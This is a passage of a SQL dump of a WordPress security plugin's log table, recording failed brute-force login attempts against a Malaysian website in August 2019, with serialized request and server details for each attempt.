ur\";s:9:\"UNIQUE_ID\";s:27:\"XWOV6LLuw7edOKpgf7B9EgAAAI8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566807528.2773\";s:12:\"REQUEST_TIME\";s:10:\"1566807528\";}}','notice','2019-08-26 08:18:49','2019-08-26 08:18:48',18203368,19502128,'https://bintara.com.my/xmlrpc.php',1,0,'173.212.241.155'),(23094,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"213.32.37.194\";s:11:\"REMOTE_PORT\";s:5:\"52386\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOZrsc7g4l7i3TBndWE1gAAAFQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566808494.6102\";s:12:\"REQUEST_TIME\";s:10:\"1566808494\";}}','notice','2019-08-26 08:34:56','2019-08-26 08:34:55',17686368,19176160,'https://bintara.com.my/wp-login.php',1,0,'213.32.37.194'),(23095,0,'brute_force','invalid-login::username-blogger','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"blogger\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"213.32.37.194\";s:11:\"REMOTE_PORT\";s:5:\"53168\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOZsTzAXRCh@i15RK04PwAAAME\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566808497.6367\";s:12:\"REQUEST_TIME\";s:10:\"1566808497\";}}','notice','2019-08-26 08:35:00','2019-08-26 08:34:57',18199072,19495072,'https://bintara.com.my/xmlrpc.php',1,0,'213.32.37.194'),(23096,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"45.122.221.228\";s:11:\"REMOTE_PORT\";s:5:\"40292\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOb@8c7g4l7i3TBndWGXQAAAEM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566809083.9802\";s:12:\"REQUEST_TIME\";s:10:\"1566809083\";}}','notice','2019-08-26 08:44:45','2019-08-26 08:44:44',17685352,19172944,'https://bintara.com.my/wp-login.php',1,0,'45.122.221.228'),(23097,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"45.122.221.228\";s:11:\"REMOTE_PORT\";s:5:\"40684\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOb-klLQKVpx7Mms7vE6wAAAdY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566809086.5033\";s:12:\"REQUEST_TIME\";s:10:\"1566809086\";}}','notice','2019-08-26 08:44:48','2019-08-26 08:44:46',18199968,19496000,'https://bintara.com.my/xmlrpc.php',1,0,'45.122.221.228'),(23098,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.78.197\";s:11:\"REMOTE_PORT\";s:5:\"35424\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOgL0lLQKVpx7Mms7vFOAAAAcQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566810159.4607\";s:12:\"REQUEST_TIME\";s:10:\"1566810159\";}}','notice','2019-08-26 09:02:40','2019-08-26 09:02:39',17682312,19172824,'https://bintara.com.my/wp-login.php',1,0,'162.144.78.197'),(23099,0,'brute_force','invalid-login::username-test','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"test\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.78.197\";s:11:\"REMOTE_PORT\";s:5:\"35860\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOgMsc7g4l7i3TBndWI3gAAAE0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566810163.0182\";s:12:\"REQUEST_TIME\";s:10:\"1566810163\";}}','notice','2019-08-26 09:02:44','2019-08-26 09:02:43',18202040,19500560,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.78.197'),(23100,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"191.101.12.135\";s:11:\"REMOTE_PORT\";s:5:\"48892\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOiH8c7g4l7i3TBndWKPwAAAEM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566810662.413\";s:12:\"REQUEST_TIME\";s:10:\"1566810662\";}}','notice','2019-08-26 09:11:03','2019-08-26 09:11:02',17682232,19172824,'https://bintara.com.my/wp-login.php',1,0,'191.101.12.135'),(23101,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"486\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"191.101.12.135\";s:11:\"REMOTE_PORT\";s:5:\"51028\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOiKXxaD7qVX4VJuZ-2PAAAAAk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566810669.2494\";s:12:\"REQUEST_TIME\";s:10:\"1566810669\";}}','notice','2019-08-26 09:11:11','2019-08-26 09:11:09',18310304,19499664,'https://bintara.com.my/xmlrpc.php',1,0,'191.101.12.135'),(23102,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.83.250\";s:11:\"REMOTE_PORT\";s:5:\"38388\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOmjMc7g4l7i3TBn